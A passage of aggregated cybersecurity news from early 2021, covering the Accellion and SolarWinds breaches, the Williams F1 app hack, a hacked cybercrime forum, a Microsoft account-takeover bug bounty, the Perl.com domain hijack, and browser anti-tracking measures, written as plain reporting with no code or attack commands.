The Cybersecurity Infrastructure and Security Agency issued an urgent alert on the hack last Wednesday and National Security Adviser Jake Sullivan tweeted about it Thursday evening.
But the White House has yet to announce any specific initiative for responding.
The launch of Williams new FW43B car ruined by hackers
8.3.2021 Hacking Securityaffairs
The presentation of Williams’s new Formula One car was ruined by hackers that forced the team to abandon the launch through an augmented reality app.
The Williams team presented its new Formula One car on Friday, but hackers partially ruined the launch by hacking an “augmented reality” app that was designed to show the new vehicle.
The British team, now owned of the American investment firm Dorilton Capital was presenting the new FW43B car, which has “a dramatic new visual identity sporting a livery inspired by Williams’ all-conquering cars of the 1980s and 1990s, combining blue, white and yellow accents.”
The formula 1 team planned to use an augmented reality app to present the car and give the fans an immersive experience, but “the app was hacked prior to launch.”
The idea to use an augmented reality app was also a consequence of the ongoing pandemic and the need to involve the fans that were not able to physically participate in the event.
The app was designed to allow fans to manipulate the car in its new livery in 3D.
The hackers were able to hack the app, steal the information and leaked the image of the FW43B online before the scheduled launch.
Source Sky Sport
This year, Williams has chosen the drivers George Russell and Nicholas Latifi for his team.
“Williams Racing is a sporting icon, and a team that has forged a reputation of success through sheer determination and grit intertwined with innovation, passionate and skillful race-craft and an absolute desire to win,” said chief executive Jost Capito.
“We were very much looking forward to sharing this experience with our fans, particularly during this difficult time when being able to bring in-person experiences directly to our fans is sadly not possible.” reads a Williams’ statement.
Williams team apologized for the security breach and to abandon plans to launch the car via the augmented reality app.
Casting a Wide Intrusion Net: Dozens Burned With Single Hack
8.3.2021 Hacking Securityweek
The SolarWinds hacking campaign blamed on Russian spies and the “grave threat” it poses to U.S. national security are widely known. A very different — and no less alarming — coordinated series of intrusions also detected in December has gotten considerably less public attention.
Nimble, highly skilled criminal hackers believed to operate out of Eastern Europe hacked dozens of companies and government agencies on at least four continents by breaking into a single product they all used.
The victims include New Zealand’s central bank, Harvard Business School, Australia’s securities regulator, the high-powered U.S. law firm Jones Day — whose clients include former President Donald Trump — the rail freight company CSX and the Kroger supermarket and pharmacy chain. Also hit was Washington state’s auditor’s office, where the personal data of up to 1.3 million people gathered for an investigation into unemployment fraud was potentially exposed.
The two-stage mega-hack in December and January of a popular file-transfer program from the Silicon Valley company Accellion highlights a threat that security experts fear may be getting out of hand: intrusions by top-flight criminal and state-backed hackers into software supply chains and third-party services.
Operating system companies such as Microsoft have long been bull’s-eyes — with untold thousands of installations of its Exchange email server being violated globally in the past few weeks, mostly after the company issued a patch and disclosed that Chinese state hackers had penetrated the program.
Supply Chain Security Summit
The Accellion casualties have kept piling up, meanwhile, with many being extorted by the Russian-speaking Clop cybercriminal gang, which threat researchers believe may have bought pilfered data from the hackers. Their threat: Pay up or we leak your sensitive data online, be it proprietary documents from Canadian aircraft maker Bombardier or lawyer-client communications from Jones Day.
The hack of up to 100 Accellion customers, who were easily identified by the hackers with an online scan, puts in painful relief a digital age core mission at which both governments and the private sector have been falling short.
“Attackers are finding it harder and harder to gain access via traditional methods, as vendors like Microsoft and Apple have hardened the security of the operating systems considerably over the last years. So, the attackers find easier ways in. This often means going via the supply chain. And as we’ve seen, it works,” said Mikko Hypponen, chief research officer of the cybersecurity firm F-Secure.
Members of Congress are already dismayed by the supply-chain hack of the Texas network management software company SolarWinds that allowed suspected Russian state-backed hackers to tiptoe unnoticed — apparently intent solely on intelligence-gathering — for more than half a year through the networks of at least nine government agencies and more than 100 companies and think tanks. Only in December was the SolarWinds hacking campaign discovered, by the cybersecurity firm FireEye.
France suffered a similar hack, blamed by its cybersecurity agency on Russian military operatives, that also gamed the supply chain. They slipped malware into an update of network management software from a firm called Centreon, letting them quietly root around victim networks from 2017 to 2020.
Both those hacks snuck malware into software updates. The Accellion hack was different in one key respect: Its file-transfer program resided on victims’ networks either as a stand-alone appliance or cloud-based app. Its job is to securely move around files too large to be attached to email.
Mike Hamilton, a former Seattle chief information security officer now with CI Security, said the trend of exploiting third-party service providers shows no signs of slowing because it gives criminals the highest return on their investment if they “want to compromise a broad swath of companies or government agencies.”
The Accellion breach’s impact might have been dulled had the company alerted customers more quickly, some complain.
The governor of New Zealand’s central bank, Adrian Orr, says Accellion failed to warn it after first learning in mid-December that the nearly 20-year-old FTA application — using antiquated technology and set for retirement — had been breached.
Despite having a patch available on Dec. 20, Accellion did not notify the bank in time to prevent its appliance from being breached five days later, the bank said.
“If we were notified at the appropriate time, we could have patched the system and avoided the breach,” Orr said in a statement posted on the bank’s website. Among information stolen were files containing personal emails, dates of birth and credit information, the bank said.
Similarly, the Washington state auditor’s office has no record of being informed of the breach until Jan. 12, the same day Accellion announced it publicly, said spokeswoman Kathleen Cooper. Accellion said then that it released a patch to the fewer than 50 customers affected within 72 hours of learning of the breach.
Accellion now tells a different story. It says it alerted all 320 potentially affected customers with multiple emails beginning on Dec. 22 — and followed up with emails and phone calls. Company spokesman Rob Dougherty would not directly address the New Zealand central bank’s and Washington state auditor’s complaints. Accellion says fewer than 25 customers appear to have suffered significant data theft.
A timeline released March 1 by the cybersecurity firm Mandiant, which Accellion hired to examine the incident, says the company got first word of the breach on Dec. 16. The Washington state auditor says its hack occurred on Christmas.
The notification timing issue is serious. Washington state has already been hit by a lawsuit, and several have been filed against Accellion seeking class action. Other organizations could also face legal or other consequences.
Last month, Harvard Business School officials emailed affected students to tell them that some Social Security numbers had been compromised as well as other personal information. Another victim, the Singapore-based telecommunications company Singtel, said personal data on about 129,000 customers was compromised.
Too often, software companies with hundreds of programmers have just one or two security people, said Katie Moussouris, CEO of Luta Security.
“We wish we could say that organizations were uniformly investing in security. But we’re actually seeing them just dealing with the breaches and then vowing to do better in the future. And that’s been sort of the business model.”
Dougherty, the Accellion spokesman, said the attacks “had nothing to do with staffing,” but he would not say how many people directly assigned to security the company employed in mid-December.
Cybersecurity threat analysts hope the snowballing of supply-chain hacks stuns the software industry into prioritizing security. Otherwise, vendors risk the fate that has befallen SolarWinds.
In a filing this past week with the Securities and Exchange Commission, the company offered a bleak outlook.
It said that as supply-chain hacks “continue to evolve at a rapid pace” it “may be unable to identify current attacks, anticipate future attacks or implement adequate security measures.”
The ultimate, painful upshot, the document added:
“Customers have and may in the future defer purchasing or choose to cancel or not renewal their agreements or subscriptions with us.”
F1 Team Williams Unveils New Car After Hackers Foil Launch
8.3.2021 Hacking Securityweek
The Williams team presented its new Formula One car on Friday — after hackers foiled plans for an “augmented reality” launch — revealing a livery inspired by its “all-conquering cars of the 1980s and 1990s.”
The British team enters its first full season under the ownership of US-based investment firm Dorilton Capital.
The FW43B car has “a dramatic new visual identity sporting a livery inspired by Williams’ all-conquering cars of the 1980s and 1990s, combining blue, white and yellow accents.”
Williams had planned to reveal the car via an augmented reality app but scrapped it “because the app was hacked prior to launch.”
The team wanted to let fans experience an innovative launch “during this difficult time when being able to bring in-person experiences directly to our fans is sadly not possible. We can only apologize that this has not been possible.”
Williams hopes to revive its fortunes when drivers George Russell and Nicholas Latifi take to the grid for the season-opening GP in Bahrain on March 28.
The team finished rock bottom in the constructors’ standings in the past two seasons, scoring only one point from Robert Kubica’s 10th-place finish in 2019.
“Williams Racing is a sporting icon, and a team that has forged a reputation of success through sheer determination and grit intertwined with innovation, passionate and skillful race-craft and an absolute desire to win,” chief executive Jost Capito said in a statement.
The livery, Capito said, “acknowledges our incredible past and retains the spirit, drive and motivation that remains at the core of Williams’ DNA yet looks to the future and signposts our long-term ambition to return to the front of the grid.”
Russell said the new look has a “hint of heritage.”
“Altogether, I think it’s exciting and I think that’s the team at the moment — new ownership, new look, new brand and it’s the start of a new beginning,” the 23-year-old British driver said in a video posted on the team’s Twitter account.
Qualys Confirms Unauthorized Access to Data via Accellion Hack
6.3.2021 Hacking Securityweek
Hours after the Clop ransomware gang published data allegedly stolen from information security and compliance solutions provider Qualys, the company has confirmed being impacted by the recent cyberattack involving Accellion’s FTA product.
Founded in 1999, the California-based firm serves more than 10,000 customers in over 130 countries around the world, including many of the Forbes Global 100 companies.
Data allegedly stolen from the company, including scan results and financial documents, was published on the “CL0P^_- LEAKS” Tor website this week. Maintained by the operators of the Clop ransomware, the portal is used to publish data stolen from victims unwilling to give in to their ransom demands.
Initially, the website would list data exfiltrated during ransomware attacks, but as of late it has been flooded with data stolen from various organizations that were relying on the Accellion FTA file transfer software.
The data was compromised during a December 2020 cyber-attack that Accellion confirmed earlier this year. A total of four zero-day vulnerabilities were identified in the attack, all of which have already been patched.
In a report published a couple of weeks ago, FireEye’s Mandiant researchers linked the attack to the FIN11 cybercrime group, a TA505 spin-off.
“The exploited vulnerabilities were of critical severity because they were subject to exploitation via unauthenticated remote code execution,” Accellion noted in a report detailing Mandiant’s investigation into the incident.
The company also said the attackers likely reverse engineered the file transfer software, which provided them with “a high level of sophistication and deep familiarity with the inner workings of the Accellion FTA software.”
Following the publishing of its data on Clop’s leaks website, Qualys confirmed impact from the Accellion FTA incident, saying that it resulted in “unauthorized access to files hosted on the Accellion FTA server.”
The company also notes that the unauthorized access was limited to the FTA server and that the incident had no “impact on the Qualys production environments, codebase or customer data hosted on the Qualys Cloud Platform.”
The Accellion FTA server, the company explains, was deployed in a segregated DMZ environment, separated from the production customer data environment. Furthermore, Qualys says it applied the released hotfix immediately after receiving it and completely isolated the FTA server after receiving an integrity alert a few days later.
“We immediately notified the limited number of customers impacted by this unauthorized access,” Qualys says, without providing additional information on the compromised data or the number of affected customers.
Mazafaka — Elite Hacking and Cybercrime Forum — Got Hacked!
6.3.2021 Hacking Thehackernews
In what's a case of hackers getting hacked, a prominent underground online criminal forum by the name of Maza has been compromised by unknown attackers, making it the fourth forum to have been breached since the start of the year.
The intrusion is said to have occurred on March 3, with information about the forum members — including usernames, email addresses, and hashed passwords — publicly disclosed on a breach notification page put up by the attackers, stating "Your data has been leaked" and "This forum has been hacked."
"The announcement was accompanied by a PDF file allegedly containing a portion of forum user data. The file comprised more than 3,000 rows, containing usernames, partially obfuscated password hashes, email addresses and other contact details," cybersecurity firm Intel 471 said.
Originally called Mazafaka, Maza is an elite, invite-only Russian-language cybercrime forum known to be operational as early as 2003, acting as an exclusive online space for exploit actors to trade ransomware-as-a-service tools and conduct other forms of illicit cyber operations.
The development comes close on the heels of successful breaches of other forums, including that of Verified, Crdclub, and Exploit.
Verified is said to have been breached on January 20, 2021, with the actor behind the attack claiming access to the entire database on another popular forum called Raid Forums, besides transferring $150,000 worth of cryptocurrency from Verified's bitcoin wallet to their own. The forum, however, staged a return last month on February 18 with a change in ownership, according to Flashpoint.
Then again, in February, a cybercrime forum known as Crdclub disclosed an attack that resulted in the compromise of an administrator account with the goal of defrauding its members. No other personal information appears to have been plundered.
"By doing so, the actor behind the attack was able to lure forum customers to use a money transfer service that was allegedly vouched for by the forum's admins," Intel 471 said. "That was a lie, and resulted in an unknown amount of money being diverted from the forum."
Lastly, earlier this week, the Exploit cybercrime forum sustained an attack that involved an apparent compromise of a proxy server used for safeguarding the forum from distributed denial-of-service (DDoS) attacks.
Details are fuzzy as to the perpetrators of the attacks, with forum members speculating that it could be the work of a government intelligence agency, while also distressing over the possibility that their real-world identities could be exposed in the wake of the leaks.
Flashpoint researchers noted that the Russian sentences on the Maza forum's notification page were possibly translated using an online translator, but added it's unclear if this implies the involvement of a non-Russian speaking actor or if it was deliberately used to mislead attribution.
"While Intel 471 isn't aware of anyone claiming responsibility for the breaches, whomever is behind the actions has indirectly given researchers an advantage," the company concluded. "Any information unearthed from the breaches aids in the fight against these criminals due to the added visibility it gives security teams who are tracking actors that populate these forums."
Bug bounty hunter awarded $50,000 for a Microsoft account hijack flaw
4.3.2021 Hacking Securityaffairs
A researcher received a $50,000 bug bounty by Microsoft for having reported a vulnerability that could’ve allowed to hijack any account.
Microsoft has awarded the security researcher Laxman Muthiyah $50,000 for reporting a vulnerability that could have allowed anyone to hijack users’ accounts without consent.
According to the expert, the vulnerability only impacts consumer accounts.
The vulnerability is related to the possibility to launch a bruteforce attack to guess the seven-digit security code that is sent via email or SMS as a method of verification in password reset procedure.
“To reset a Microsoft account’s password, we need to enter our email address or phone number in their forgot password page, after that we will be asked to select the email or mobile number that can be used to receive security code.” the expert wrote. “Once we receive the 7 digit security code, we will have to enter it to reset the password. Here, if we can bruteforce all the combination of 7 digit code (that will be 10^7 = 10 million codes), we will be able to reset any user’s password without permission.”
The researcher pointed out that rate limits are implemented to limit the number of attempts and protect the accounts.
The analysis of the HTTP POST request sent to validate the code revealed that the code is encrypted before being sent, this means that in order to automate bruteforce attacks it was necessary to break the encryption.
“If you look at the screenshot above, the code 1234567 we entered was nowhere present in the request. It was encrypted and then sent for validation.” continues the post. “I guess they are doing this to prevent automated bruteforce tools from exploiting their system. So, we cannot automate testing multiple codes using tools like Burp Intruder since they won’t do the encryption part.”
To determine the limit rate implemented to protect the accounts, the expert sent 1000 code attempts, but only 122 were processed, the remaining resulted in an error (1211 error code) and any other request was blocked.
By sending simultaneous requests, the expert bypassed the blocking mechanism and the encryption. The expert noticed that the mechanism blacklists the IP address if all the requests sent don’t arrive to the server at the same time
However, the attack is not simple in a real scenario, an attacker has to send the possibilities of security codes, approximately 11 million request attempts, concurrently to change the password of any Microsoft account (including those with 2FA enabled).
This attack would require a lot of computing resources as well as 1000s of IP address to complete the attack successfully.
Muthiyah reported the flaw to Microsoft, which quickly acknowledged the issue and addressed it in November 2020.
The bug bounty award of $50,000 was issued on February 9 via the HackerOne bug bounty platform, a partner for distributing rewards. Microsoft offers between $1,500 and $100,000 for valid bug reports.
“I received the bounty of $50,000 USD on Feb 9th, 2021 through hackerone and got approval to publish this article on March 1st. I would like to thank Dan, Jarek and the entire MSRC Team for patiently listening to all my comments, providing updates and patching the issue. I also like to thank Microsoft for the bounty.” concluded the expert.
Hackers Control Perl.com Domain Months Before Hijack
3.3.2021 Hacking Securityweek
The Perl.com domain was hijacked in January 2021, but hackers seemingly took control of it four months prior, in September 2020.
Serving articles about the Perl programming language since 1997 and managed by The Perl Foundation, the domain started pointing to a parked site at the end of January, with evidence suggesting connections to sites distributing malware.
The issue, some of those involved with maintaining the site said at the time, was related to an account hijack that resulted in an unknown party being able to grab the domain for ten years.
In a post on Sunday, Brian Foy, senior editor of Perl.com and author of several books on Perl, explains that the account hijack appears to have been, in fact, an attack on the domain name registrar Network Solutions.
The attack, he explains, took place in September 2020 and might have resulted in several other domains being compromised.
“We think that there was a social engineering attack on Network Solutions, including phony documents and so on. There’s no reason for Network Solutions to reveal anything to me, but I did talk to other domain owners involved and this is the basic scheme they reported,” he notes.
In December, the hackers transferred the domain to the BizCN registrar. Although the domain was compromised in September, ICANN prohibits the transfer of a domain for 60 days following the updating of contact info.
The attackers also renewed the domain for two more years and, in January 2021, transferred it once again, this time to Key Systems, GmbH.
“This latency period avoids immediate detection, and bouncing the domain through a couple registrars makes the recovery much harder,” Foy says.
Following the transfer to Key Systems, however, the fraudulent registrant also listed the Perl.com on domain marketplace Afternic, for $190,000.
The domain was back in the hands of Tom Christiansen, the rightful owner, in early February. However, with security products quick to blacklist it and some DNS servers sinkholing it, it took a while longer for everything to be restored to normal.
“I think we’re fully back,” Foy notes, adding that the team is working on ensuring that such hijacking doesn’t happen again.
Dairy Giant Lactalis Targeted by Hackers
3.3.2021 Hacking Securityweek
France-based dairy giant Lactalis revealed last week that it was targeted by hackers, but claimed that it had found no evidence of a data breach.
The company said a malicious third party attempted to breach its computer network, but it immediately took action to contain the attack. This included restricting access to public resources.
Authorities have been notified and Lactalis’ IT team has been working with external cybersecurity experts to investigate the incident. However, the company said it did not appear that any data was compromised.
SecurityWeek has reached out to Lactalis for more information and will update this article if the company responds.
Based on the limited information made public by the company, this could be a ransomware attack conducted by a threat actor that — in addition to encrypting files on the compromised network — steals potentially sensitive files and threatens to leak them unless a ransom is paid.
Lactalis is one of the largest dairy product groups in the world, delivering more than 2,000 types of products — including famous brands such as Président and Galbani — to more than 100 countries. The company employs roughly 85,000 people and has operations in over 50 countries.
Intern caused ‘solarwinds123’ password leak, former SolarWinds CEO says
2.3.2021 Hacking Securityaffairs
Top executives of the software firm SolarWinds blamed an intern for having used a weak password for several years, exposing the company to hack.
Top executives of the SolarWinds firm believe that the root cause of the recently disclosed supply chain attack is an intern that has used a weak password for several years.
Initial investigation suggested that the password “solarwinds123” was publicly accessible via a misconfigured GitHub repository since June 17, 2018. The issue was addressed on November 22, 2019.
In December, Security researcher Vinoth Kumar revealed he notified the company of a publicly accessible GitHub repository that was leaking the FTP credentials of the company’s download website in the clear text. An attacker could have used these credentials to upload tainted updates to the company download site.
New details emerged about the security breach, in a hearing before the House Committees on Oversight and Reform and Homeland Security, CEO Sudhakar Ramakrishna confirmed that the password had been in use as early as 2017.
A preliminary investigation revealed that the threat actors behind the SolarWinds attack compromised the SolarWinds Orion supply chain as early as October 2019, but later Crowdstrikes’ researchers dated the initial compromise on September 4, 2019.
“I’ve got a stronger password than ‘solarwinds123’ to stop my kids from watching too much YouTube on their iPad,” Representative Katie Porter of California said. “You and your company were supposed to be preventing the Russians from reading Defense Department emails.”
“I believe that was a password that an intern used on one of his servers back in 2017 which was reported to our security team and it was immediately removed,” Ramakrishna said in response to Porter.
The investigators don’t exclude the use of stolen credentials and brute-force attacks as possible attack vectors.
Confronted by Rep. Rashida Tlaib, former SolarWinds CEO Kevin Thompson declared that the password issue was “a mistake that an intern made.” “They violated our password policies and they posted that password on an internal, on their own private Github account,” Thompson explained. “As soon as it was identified and brought to the attention of my security team, they took that down.”
According to SolarWinds, up to 18,000 customers may have been impacted by the supply chain attack, including prominent IT and security firms (Microsoft, FireEye, Malwarebytes, CrowdStrike, and Mimecast), several Government agencies (Departments of State, Justice, Commerce, Homeland Security, Energy, Treasury, and the National Institutes of Health), the National Aeronautics and Space Administration (NSA), and the Federal Aviation Administration (FAA).
“In addition to this estimate, we have identified additional government and private sector victims in other countries, and we believe it is highly likely that there remain other victims not yet identified, perhaps especially in regions where cloud migration is not as far advanced as it is in the United States,” Microsoft President Brad Smith said during the hearing.
Experts pointed out that attackers are very advanced and did all the best to remain under the radar, such as launching the attack from inside the United States to cover its activities.
SolarWinds Blames Intern for 'solarwinds123' Password Lapse
2.3.2021 Hacking Thehackernews
As cybersecurity researchers continue to piece together the sprawling SolarWinds supply chain attack, top executives of the Texas-based software services firm blamed an intern for a critical password lapse that went unnoticed for several years.
The said password "solarwinds123" was originally believed to have been publicly accessible via a GitHub repository since June 17, 2018, before the misconfiguration was addressed on November 22, 2019.
But in a hearing before the House Committees on Oversight and Reform and Homeland Security on SolarWinds on Friday, CEO Sudhakar Ramakrishna testified that the password had been in use as early as 2017.
While a preliminary investigation into the attack revealed that the operators behind the espionage campaign managed to compromise the software build and code signing infrastructure of SolarWinds Orion platform as early as October 2019 to deliver the Sunburst backdoor, Crowdstrike's incident response efforts pointed to a revised timeline that established the first breach of SolarWinds network on September 4, 2019.
To date, at least nine government agencies and 100 private sector companies have been breached in what's being described as one of the most sophisticated and well-planned operations that involved injecting the malicious implant into the Orion Software Platform with the goal of compromising its customers.
"A mistake that an intern made."
"I've got a stronger password than 'solarwinds123' to stop my kids from watching too much YouTube on their iPad," Representative Katie Porter of California said. "You and your company were supposed to be preventing the Russians from reading Defense Department emails."
"I believe that was a password that an intern used on one of his servers back in 2017 which was reported to our security team and it was immediately removed," Ramakrishna said in response to Porter.
Former CEO Kevin Thompson echoed Ramakrishna's statement during the testimony. "That related to a mistake that an intern made, and they violated our password policies and they posted that password on their own private GitHub account," Thompson said. "As soon as it was identified and brought to the attention of my security team, they took that down."
Security researcher Vinoth Kumar disclosed in December that he notified the company of a publicly accessible GitHub repository that was leaking the FTP credentials of the company's download website in the clear, adding a hacker could use the credentials to upload a malicious executable and add it to a SolarWinds update.
In the weeks following the revelation, SolarWinds was hit with a class-action lawsuit in January 2021 that alleged the company failed to disclose that "since mid-2020, SolarWinds Orion monitoring products had a vulnerability that allowed hackers to compromise the server upon which the products ran," and that "SolarWinds' update server had an easily accessible password of 'solarwinds123'," as a result of which the company "would suffer significant reputational harm."
NASA and FAA Also Targeted
Up to 18,000 SolarWinds customers are believed to have received the trojanized Orion update, although the threat actor behind the operation carefully chose their targets, opting to escalate the attacks only in a handful of cases by deploying Teardrop malware based on intel amassed during an initial reconnaissance of the target environment for high-value accounts and assets.
Besides infiltrating the networks of Microsoft, FireEye, Malwarebytes, and Mimecast, the attackers are also said to have used SolarWinds as a jumping-off point to penetrate the National Aeronautics and Space Administration (NSA) and the Federal Aviation Administration (FAA), according to the Washington Post.
The seven other breached agencies are the Departments of State, Justice, Commerce, Homeland Security, Energy, Treasury, and the National Institutes of Health.
"In addition to this estimate, we have identified additional government and private sector victims in other countries, and we believe it is highly likely that there remain other victims not yet identified, perhaps especially in regions where cloud migration is not as far advanced as it is in the United States," Microsoft President Brad Smith said during the hearing.
The threat group, alleged to be of Russian origin, is being tracked under different monikers, including UNC2452 (FireEye), SolarStorm (Palo Alto Unit 42), StellarParticle (CrowdStrike), and Dark Halo (Volexity).
"The hackers launched the hack from inside the United States, which further made it difficult for the U.S. government to observe their activity," Deputy National Security Advisor Anne Neuberger said in a White House briefing last month. "This is a sophisticated actor who did their best to hide their tracks. We believe it took them months to plan and execute this compromise."
Adopting a "Secure by Design" Approach
Likening the SolarWinds cyberattack to a "large-scale series of home invasions," Smith urged the need for strengthening the tech sector's software and hardware supply chains, and promoting broader sharing of threat intelligence for real-time responses during such incidents.
To that effect, Microsoft has open-sourced CodeQL queries used to hunt for Solorigate activity, which it says could be used by other organizations to analyze their source code at scale and check for indicators of compromise (IoCs) and coding patterns associated with the attack.
In a related development, cybersecurity researchers speaking to The Wall Street Journal disclosed that the suspected Russian hackers used Amazon's cloud-computing data centers to mount a key part of the campaign, throwing fresh light on the scope of the attacks and the tactics employed by the group. The tech giant, however, has so far not made its insights into the hacking activity public.
SolarWinds, for its part, said it's implementing the knowledge gained from the incident to evolve into a company that is "Secure by Design" and that it's deploying additional threat protection and threat hunting software across all its network endpoints including measures to safeguard its development environments.
Microsoft Releases Open Source Resources for Solorigate Threat Hunting
27.2.2021 Hacking Securityweek
Microsoft on Thursday announced the open source availability of CodeQL queries that it used during its investigation into the SolarWinds attack.
Believed to be sponsored by Russia, the attackers hacked into the systems of IT management solutions firm SolarWinds in 2019 and, using the Sundrop malware, they inserted the Sunburst backdoor into the SolarWinds Orion monitoring product.
Thus, thousands of organizations worldwide were eventually infected with Sunburst, but the attackers only delivered additional malware to a few hundred victims of interest. The attackers also used hands-on-keyboard techniques to compromise systems at these organizations.
Microsoft, which tracks the attacks as Solorigate, has published several reports to provide information on the employed techniques, the attackers, and the scope of the incident, and this week decided to make some of the tools used in its investigation available to other companies as well.
The company has released the source code of CodeQL queries, which it used to analyze its code at scale and identify any code-level indicators of compromise (IoCs) associated with Solorigate.
“We are open sourcing the CodeQL queries that we used in this investigation so that other organizations may perform a similar analysis. Note that the queries […] simply serve to home in on source code that shares similarities with the source in the Solorigate implant, either in the syntactic elements (names, literals, etc.) or in functionality,” the company says.
Microsoft also underlines that reviews would still be required to ensure the correct results, and that the malicious actor might use other functionality and coding style in different operations, meaning that these queries won’t be able to detect implants that deviate significantly.
The tech company also explains that it chose to work with CodeQL for this analysis because the engine allows for the creation of “a database that captures the model of the compiling code,” which can then be queried repeatedly.
Microsoft has made C# queries meant for the assessment of code-level IoCs available in the CodeQL GitHub repository, with detailed information on each query and the code-level IoCs it attempts to find available in the Solorigate-Readme.md. Guidance on making adjustments is also included.
“GitHub will shortly publish guidance on how they are deploying these queries for existing CodeQL customers. As a reminder, CodeQL is free for open-source projects hosted by GitHub,” Microsoft also notes.
The company also explains that, while investigating Solorigate, on the one hand it looked for syntax associated with code-level IoCs, while on the other it investigated overall semantic patterns of the techniques in those IoCs. Thus, detection would catch scenarios where techniques changed but syntax didn’t, or the other way around.
“Because it’s possible that the malicious actor could change both syntax and techniques, CodeQL was but one part of our larger investigative effort,” the tech giant notes.
Mozilla Patches Bugs in Firefox, Now Blocks Cross-Site Cookie Tracking
25.2.2021 Hacking Threatpost
Mozilla said its Total Cookie Protection feature in Firefox 86 prevents invasive, cross-site cookie tracking.
The Mozilla Foundation has released its latest version of the Firefox browser, which comes with new privacy protections to squash cross-site cookie tracking, as well as a slew of security vulnerability fixes.
Firefox 86, released on Tuesday, includes what it touts as a privacy-bolstering feature called Total Cookie Protection. This new feature isolates each cookie assigned by each website – preventing websites from tracking internet users in an invasive, cross-site manner.
“Total Cookie Protection confines cookies to the site where they were created, which prevents tracking companies from using these cookies to track your browsing from site to site,” said Tim Huang, Johann Hofmann and Arthur Edelstein with Mozilla on Tuesday.
Cookies: Busting Privacy Problems
HTTP cookies are small data files stored by web browsers while users are perusing various websites. These are used as a unique identifier to improve web browsing experience and enable user-specific ads – a necessary part of the internet economy.
However, tracking cookies can also pose a “serious privacy vulnerability,” said Mozilla, because third-party companies – like data brokers, affiliate networks and advertising networks – can use them to track users’ browser activity – even when they visit other websites. Advertisers can then use the tracking cookies to better understand which websites that users visit – whether those are social media websites or otherwise – and ultimately piece together a digital picture of who users are. Those details can also be transferred to a third party and stored on remote servers.
“This type of cookie-based tracking has long been the most prevalent method for gathering intelligence on users,” said Huang, Hofman and Edelstein. “It’s a key component of the mass commercial tracking that allows advertising companies to quietly build a detailed personal profile of you.”
Firefox Total Cookie Protection
Total Cookie Protection aims to reign in some of these privacy concerns by creating what Mozilla calls a separate “cookie jar” for each website that a user visits.
Credit: The Mozilla Foundation
Each time a user visits a website, the website (or third-party content embedded in the website) will deposit the cookie in the user’s browser. That cookie is then confined to the “cookie jar” assigned to that website – but it is not allowed to be shared with any other website. This would prevent invasive cross-site tracking by various third-party companies.
Mozilla said that Total Cookie Protection does make “a limited exception” for cross-site cookies when they are needed for non-tracking purposes – including those used by popular third-party login providers.
“Only when Total Cookie Protection detects that you intend to use a provider, will it give that provider permission to use a cross-site cookie specifically for the site you’re currently visiting,” said Huang, Hofman and Edelstein. “Such momentary exceptions allow for strong privacy protection without affecting your browsing experience.”
Browsers Taking Cookie-Tracking Privacy Measures
Mozilla has been on a war path against tracking cookies since 2018, when it announced a campaign blocking tracking cookies by default in Firefox and implementing various other privacy measures in its browser. In October 2018, for stance, Firefox rolled out (off-by-default) enhanced tracking protection features, which gave users the option to block cookies and storage access from third-party trackers.
Other browsers have offered up their own various tactics combating the privacy holes introduced by tracking cookies. Google, for instance, in 2020 set an aggressive two-year deadline for dropping support for third-party tracking cookies in its Chrome web browser. And Apple in March released an update to its Safari browser that would block third-party cookies by default.
Mozilla Firefox 86 Security Fixes
Firefox 86 also comes with three security fixes for high-severity flaws. Two of these flaws exist in the Content Security Policy (CSP), a security mechanism for browsers that prevents cross-site scripting, clickjacking and other code injection attacks. The first vulnerability (CVE-2021-23969) could allow a remote attacker to obtain sensitive data. In the process of creating a violation report for CSP, Firefox’s implementation of the process incorrectly set the source file to be the destination of the redirects.
“By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability to obtain the destination of a redirect,” according to an analysis by vulnerability search engine Vulmon.
Mozilla fixed this error by making the source file the redirect destination’s origin as opposed to its destination.
Another flaw (CVE-2021-23968) stems from the CSP violation report process. While details regarding this flaw are scant, Mozilla said that the vulnerability can be used to leak sensitive information contained in Uniform Resource Identifiers (URIs).
“If Content Security Policy blocked frame navigation, the full destination of a redirect served in the frame was reported in the violation report; as opposed to the original frame URI,” according to Mozilla.
Online Trackers Increasingly Switching to Invasive CNAME Cloaking Technique
25.2.2021 Hacking Thehackernews
With browser makers steadily clamping down on third-party tracking, advertising technology companies are increasingly embracing a DNS technique to evade such defenses, thereby posing a threat to web security and privacy.
Called CNAME Cloaking, the practice of blurring the distinction between first-party and third-party cookies not only results in leaking sensitive private information without users' knowledge and consent but also "increases [the] web security threat surface," said a group of researchers Yana Dimova, Gunes Acar, Lukasz Olejnik, Wouter Joosen, and Tom Van Goethem in a new study.
"This tracking scheme takes advantage of a CNAME record on a subdomain such that it is same-site to the including web site," the researchers said in the paper. "As such, defenses that block third-party cookies are rendered ineffective."
The findings are expected to be presented in July at the 21st Privacy Enhancing Technologies Symposium (PETS 2021).
Rise of Anti-Tracking Measures
Over the past four years, all major browsers, with the notable exception of Google Chrome, have included countermeasures to curb third-party tracking.
Apple set the ball rolling with a Safari feature called Intelligent Tracking Protection (ITP) in June 2017, setting a new privacy standard on desktop and mobile to reduce cross-site tracking by "further limiting cookies and other website data." Two years later, the iPhone maker outlined a separate plan dubbed "Privacy Preserving Ad Click Attribution" to make online ads private.
Mozilla then began blocking third-party cookies in Firefox by default as of September 2019 through a feature called Enhanced Tracking Protection (ETP), and in January 2020, Microsoft's Chromium-based Edge browser followed suit. Subsequently, in late March 2020, Apple updated ITP with full third-party cookie blocking, among other features aimed at thwarting login fingerprinting.
Although Google early last year announced plans to phase out third-party cookies and trackers in Chrome in favor of a new framework called the "privacy sandbox," it's not expected to go live until some time in 2022.
In the meantime, the search giant has been actively working with ad tech companies on a proposed replacement called "Dovekey" that looks to supplant the functionality served by cross-site tracking using privacy-centered technologies to serve personalized ads on the web.
CNAME Cloaking as an Anti-Tracking Evasion Scheme
In the face of these cookie-killing barriers to enhance privacy, marketers have begun looking for alternative ways to evade the absolutist stance taken by browser makers against cross-site tracking.
Enter canonical name (CNAME) cloaking, where websites use first-party subdomains as aliases for third-party tracking domains via CNAME records in their DNS configuration in order to circumvent tracker-blockers.
CNAME records in DNS allow for mapping a domain or subdomain to another (i.e., an alias), thus making them an ideal means to smuggle tracking code under the guise of a first-party subdomain.
"This means a site owner can configure one of their subdomains, such as sub.blog.example, to resolve to thirdParty.example, before resolving to an IP address," WebKit security engineer John Wilander explains. "This happens underneath the web layer and is called CNAME cloaking — the thirdParty.example domain is cloaked as sub.blog.example and thus has the same powers as the true first-party."
